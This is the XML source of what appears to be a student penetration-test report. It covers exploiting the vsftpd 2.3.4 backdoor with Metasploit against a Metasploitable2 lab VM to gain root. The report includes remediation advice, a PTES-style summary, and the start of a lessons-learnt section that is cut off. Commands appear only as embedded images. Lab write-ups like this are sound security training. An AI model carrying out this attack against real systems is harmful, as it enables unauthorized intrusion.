    <w:p w14:paraId="0C42F34B" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="7F7C2C41" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="59BAB9AA" w14:textId="3C609DBA" w:rsidR="00207B0D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Search the exploit. We are going to use the highlighted exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7198EE" w14:textId="618FACC1" w:rsidR="00207B0D" w:rsidRDefault="00717C74" w:rsidP="00207B0D">
      <w:r w:rsidRPr="00BA5186">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251739136" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="27518E80" wp14:editId="3D49EE71">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>16510</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5732890" cy="1224364"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="467720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720774" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId81">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5732890" cy="1224364"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0004CB11" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRPr="00BA5186" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="52EEEE2B" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRPr="00BA5186" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="3333BACB" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="49537955" w14:textId="77777777" w:rsidR="00717C74" w:rsidRDefault="00717C74" w:rsidP="00207B0D"/>
    <w:p w14:paraId="3BFE07D7" w14:textId="77777777" w:rsidR="00717C74" w:rsidRDefault="00717C74" w:rsidP="00207B0D"/>
    <w:p w14:paraId="09B4C197" w14:textId="77777777" w:rsidR="00717C74" w:rsidRPr="00BA5186" w:rsidRDefault="00717C74" w:rsidP="00207B0D"/>
    <w:p w14:paraId="6291D6E9" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="0FEE8855" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Use the exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF0D6A1" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D">
      <w:r w:rsidRPr="00795298">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251740160" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3ADFE2E7" wp14:editId="3A108EC3">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>23854</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4534533" cy="609685"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="405188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88262" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId82">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4534533" cy="609685"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E66CFB4" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRPr="00795298" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="593B17D6" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="4B0E58B7" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="006E3482" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="7E8D8423" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1E48">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251741184" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="28419653" wp14:editId="7730AC91">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>244779</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4643562" cy="466813"/>
            <wp:effectExtent l="0" t="0" r="5080" b="9525"/>
            <wp:wrapNone/>
            <wp:docPr id="789843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43648" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId83">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4643562" cy="466813"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t>Set the target machine to Metasploitable2 VM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1613347E" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="6669AC10" w14:textId="77777777" w:rsidR="00A73A9A" w:rsidRDefault="00A73A9A" w:rsidP="00207B0D"/>
    <w:p w14:paraId="76312DFD" w14:textId="77777777" w:rsidR="00A73A9A" w:rsidRDefault="00A73A9A" w:rsidP="00207B0D"/>
    <w:p w14:paraId="38C5856C" w14:textId="77777777" w:rsidR="00A73A9A" w:rsidRDefault="00A73A9A" w:rsidP="00207B0D"/>
    <w:p w14:paraId="79D19053" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="779AB616" w14:textId="5108D133" w:rsidR="00207B0D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Run the exploit and we get root access to Metasploitable2 VM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0548669A" w14:textId="5A4E76FB" w:rsidR="00207B0D" w:rsidRPr="00930929" w:rsidRDefault="004A4CE0" w:rsidP="00207B0D">
      <w:r w:rsidRPr="00930929">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251742208" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="21591C48" wp14:editId="7F5B9B5F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1905</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5732890" cy="1520808"/>
            <wp:effectExtent l="0" t="0" r="1270" b="3810"/>
            <wp:wrapNone/>
            <wp:docPr id="901817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17348" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId84">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5732890" cy="1520808"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4594D81E" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="7A33DD3F" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRPr="00930929" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="32BBBEBC" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRPr="00930929" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="67910E15" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="37ECA698" w14:textId="77777777" w:rsidR="00D773BF" w:rsidRDefault="00D773BF" w:rsidP="00207B0D"/>
    <w:p w14:paraId="39AA8AFA" w14:textId="77777777" w:rsidR="00D773BF" w:rsidRDefault="00D773BF" w:rsidP="00207B0D"/>
    <w:p w14:paraId="17410426" w14:textId="77777777" w:rsidR="00D773BF" w:rsidRPr="00930929" w:rsidRDefault="00D773BF" w:rsidP="00207B0D"/>
    <w:p w14:paraId="42D62906" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="2CF0AC83" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="2816F58F" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Remediation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D72BDE" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRPr="00440E7E" w:rsidRDefault="00207B0D" w:rsidP="00207B0D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00440E7E">
        <w:t>Patch vsftpd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or upgrade version.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BAB0FA" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRPr="00440E7E" w:rsidRDefault="00207B0D" w:rsidP="00207B0D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00440E7E">
        <w:t>Disable vulnerable FTP service if unused</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55242BAE" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00440E7E">
        <w:t>Implement firewall rules</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AC8947" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="611B452E" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="6E39CE20" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="3AA5885A" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="7B6CBFBB" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="16045D60" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="407EE9D7" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="5FDDBF43" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="58FF453B" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="540FC4BF" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="7BFBA4D5" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="7FEF6A39" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="1ECB0DD0" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="6EDD96D6" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="3425C1D1" w14:textId="77777777" w:rsidR="00B329FE" w:rsidRDefault="00B329FE" w:rsidP="00207B0D"/>
    <w:p w14:paraId="0EBFB9B1" w14:textId="77777777" w:rsidR="00B329FE" w:rsidRDefault="00B329FE" w:rsidP="00207B0D"/>
    <w:p w14:paraId="7156E177" w14:textId="77777777" w:rsidR="00B329FE" w:rsidRDefault="00B329FE" w:rsidP="00207B0D"/>
    <w:p w14:paraId="04C4B1CE" w14:textId="77777777" w:rsidR="00B329FE" w:rsidRDefault="00B329FE" w:rsidP="00207B0D"/>
    <w:p w14:paraId="7680E88D" w14:textId="77777777" w:rsidR="00B329FE" w:rsidRDefault="00B329FE" w:rsidP="00207B0D"/>
    <w:p w14:paraId="523B568F" w14:textId="77777777" w:rsidR="00B329FE" w:rsidRDefault="00B329FE" w:rsidP="00207B0D"/>
    <w:p w14:paraId="16E7006D" w14:textId="77777777" w:rsidR="00B329FE" w:rsidRDefault="00B329FE" w:rsidP="00207B0D"/>
    <w:p w14:paraId="4E0E2482" w14:textId="77777777" w:rsidR="00B329FE" w:rsidRDefault="00B329FE" w:rsidP="00207B0D"/>
    <w:p w14:paraId="5959947E" w14:textId="77777777" w:rsidR="00B329FE" w:rsidRDefault="00B329FE" w:rsidP="00207B0D"/>
    <w:p w14:paraId="61655770" w14:textId="77777777" w:rsidR="00B329FE" w:rsidRDefault="00B329FE" w:rsidP="00207B0D"/>
    <w:p w14:paraId="1049B85C" w14:textId="77777777" w:rsidR="00B329FE" w:rsidRDefault="00B329FE" w:rsidP="00207B0D"/>
    <w:p w14:paraId="64680543" w14:textId="77777777" w:rsidR="00B329FE" w:rsidRDefault="00B329FE" w:rsidP="00207B0D"/>
    <w:p w14:paraId="392E429E" w14:textId="77777777" w:rsidR="00B329FE" w:rsidRDefault="00B329FE" w:rsidP="00207B0D"/>
    <w:p w14:paraId="2E5C883B" w14:textId="77777777" w:rsidR="00B329FE" w:rsidRDefault="00B329FE" w:rsidP="00207B0D"/>
    <w:p w14:paraId="54961A6B" w14:textId="77777777" w:rsidR="00B329FE" w:rsidRDefault="00B329FE" w:rsidP="00207B0D"/>
    <w:p w14:paraId="45F08B60" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB20B2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>PTES Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECCB262" w14:textId="77777777" w:rsidR="00551665" w:rsidRDefault="00551665" w:rsidP="00207B0D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="381FB0A0" w14:textId="544F6F9B" w:rsidR="00207B0D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D">
      <w:r w:rsidRPr="001C5E26">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Executive Summary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="000A724D">
        <w:t xml:space="preserve">This penetration test evaluated a Metasploitable2 virtual machine's security posture. The evaluation found that the vsftpd 2.3.4 service has a serious remote code execution vulnerability. A high-risk exposure was demonstrated by the successful exploitation, which gave unauthorized shell access to the system. </w:t>
      </w:r>
      <w:r w:rsidR="00F51C4D">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="000A724D">
        <w:t>he system is extremely susceptible and has to be fixed right away to avoid compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6859936B" w14:textId="77777777" w:rsidR="00551665" w:rsidRPr="000A724D" w:rsidRDefault="00551665" w:rsidP="00207B0D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32C7C04B" w14:textId="0C736CB5" w:rsidR="00207B0D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D">
      <w:r w:rsidRPr="001C5E26">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Attack Timeline</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00174611">
        <w:t xml:space="preserve">Nmap was used for reconnaissance to find open ports and services at the start of the engagement. An FTP service running vsftpd 2.3.4 was found by the scan. This version was found to be susceptible to a known backdoor exploit. The vulnerability was successfully carried out using Metasploit, allowing shell access to the target system. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC59482" w14:textId="77777777" w:rsidR="00551665" w:rsidRPr="00174611" w:rsidRDefault="00551665" w:rsidP="00207B0D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3428D2BE" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D">
      <w:r w:rsidRPr="001C5E26">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Remediation Plan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BC0403">
        <w:t>It is advised to update or patch the susceptible vsftpd service right away in order to reduce the risks that have been detected. To lessen the attack surface, unnecessary services should be turned off. To guarantee continued security compliance, OpenVAS vulnerability scans should be carried out on a regular basis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D29802B" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="4137E935" w14:textId="77777777" w:rsidR="00551665" w:rsidRDefault="00551665" w:rsidP="00207B0D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C26AD7D" w14:textId="65DF43C6" w:rsidR="00207B0D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidRPr="00F2108C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>on-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="00F2108C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">echnical </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00F2108C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ummary for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00F2108C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>takeholders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DA7345" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D">
      <w:r w:rsidRPr="00A76FE3">
        <w:t>This security assessment identified serious weaknesses in the tested system that could allow attackers to gain full control. The most critical issue was found in the file transfer service, which allowed unauthorized remote access without proper authentication. This means an attacker could easily enter the system, access sensitive data, or disrupt operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A51FE66" w14:textId="77777777" w:rsidR="00551665" w:rsidRPr="00A76FE3" w:rsidRDefault="00551665" w:rsidP="00207B0D"/>
    <w:p w14:paraId="2184F642" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D">
      <w:r w:rsidRPr="00A76FE3">
        <w:t>To address these risks, it is important to update outdated software, remove unnecessary services, and implement stronger security controls. Regular security testing should also be performed to ensure ongoing protection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182E75C9" w14:textId="77777777" w:rsidR="00551665" w:rsidRPr="00A76FE3" w:rsidRDefault="00551665" w:rsidP="00207B0D"/>
    <w:p w14:paraId="04E813CD" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRPr="00BC0403" w:rsidRDefault="00207B0D" w:rsidP="00207B0D">
      <w:r w:rsidRPr="00A76FE3">
        <w:t>By fixing these issues promptly, the organization can significantly reduce the risk of cyberattacks and protect its systems, data, and users from potential harm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564C606F" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRPr="00FB20B2" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="300857D9" w14:textId="77777777" w:rsidR="0052459F" w:rsidRDefault="0052459F" w:rsidP="0052459F"/>
    <w:p w14:paraId="0A1444C4" w14:textId="77777777" w:rsidR="004F2486" w:rsidRDefault="004F2486" w:rsidP="0052459F"/>
    <w:p w14:paraId="53419E01" w14:textId="77777777" w:rsidR="004F2486" w:rsidRDefault="004F2486" w:rsidP="0052459F"/>
    <w:p w14:paraId="10461B90" w14:textId="77777777" w:rsidR="004F2486" w:rsidRDefault="004F2486" w:rsidP="0052459F"/>
    <w:p w14:paraId="3E2B3223" w14:textId="77777777" w:rsidR="004F2486" w:rsidRDefault="004F2486" w:rsidP="0052459F"/>
    <w:p w14:paraId="2202144B" w14:textId="77777777" w:rsidR="004F2486" w:rsidRDefault="004F2486" w:rsidP="0052459F"/>
    <w:p w14:paraId="2DBFF6C1" w14:textId="77777777" w:rsidR="004F2486" w:rsidRDefault="004F2486" w:rsidP="0052459F"/>
    <w:p w14:paraId="574EC337" w14:textId="57706E79" w:rsidR="004F2486" w:rsidRDefault="0080211C" w:rsidP="0080211C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc224731507"/>
      <w:r w:rsidRPr="0080211C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Lessons Learnt</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="75D47052" w14:textId="5C34CADC" w:rsidR="0080211C" w:rsidRPr="0080211C" w:rsidRDefault="00B36234" w:rsidP="0080211C">
      <w:r>
        <w:t xml:space="preserve">In this task I got to perform </w:t>
      </w:r>
      <w:r w:rsidRPr="00B36234">
        <w:t>multi-stage attack</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on Metasploitable2 VM, </w:t>
      </w:r>
      <w:r w:rsidR="00954A38">
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00954A38" w:rsidRPr="00954A38">
        <w:t>est a DVWA API for OWASP API Top 10 issues</w:t>
      </w:r>
      <w:r w:rsidR="00954A38">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00FF494B">
        <w:t>u</w:t>
      </w:r>
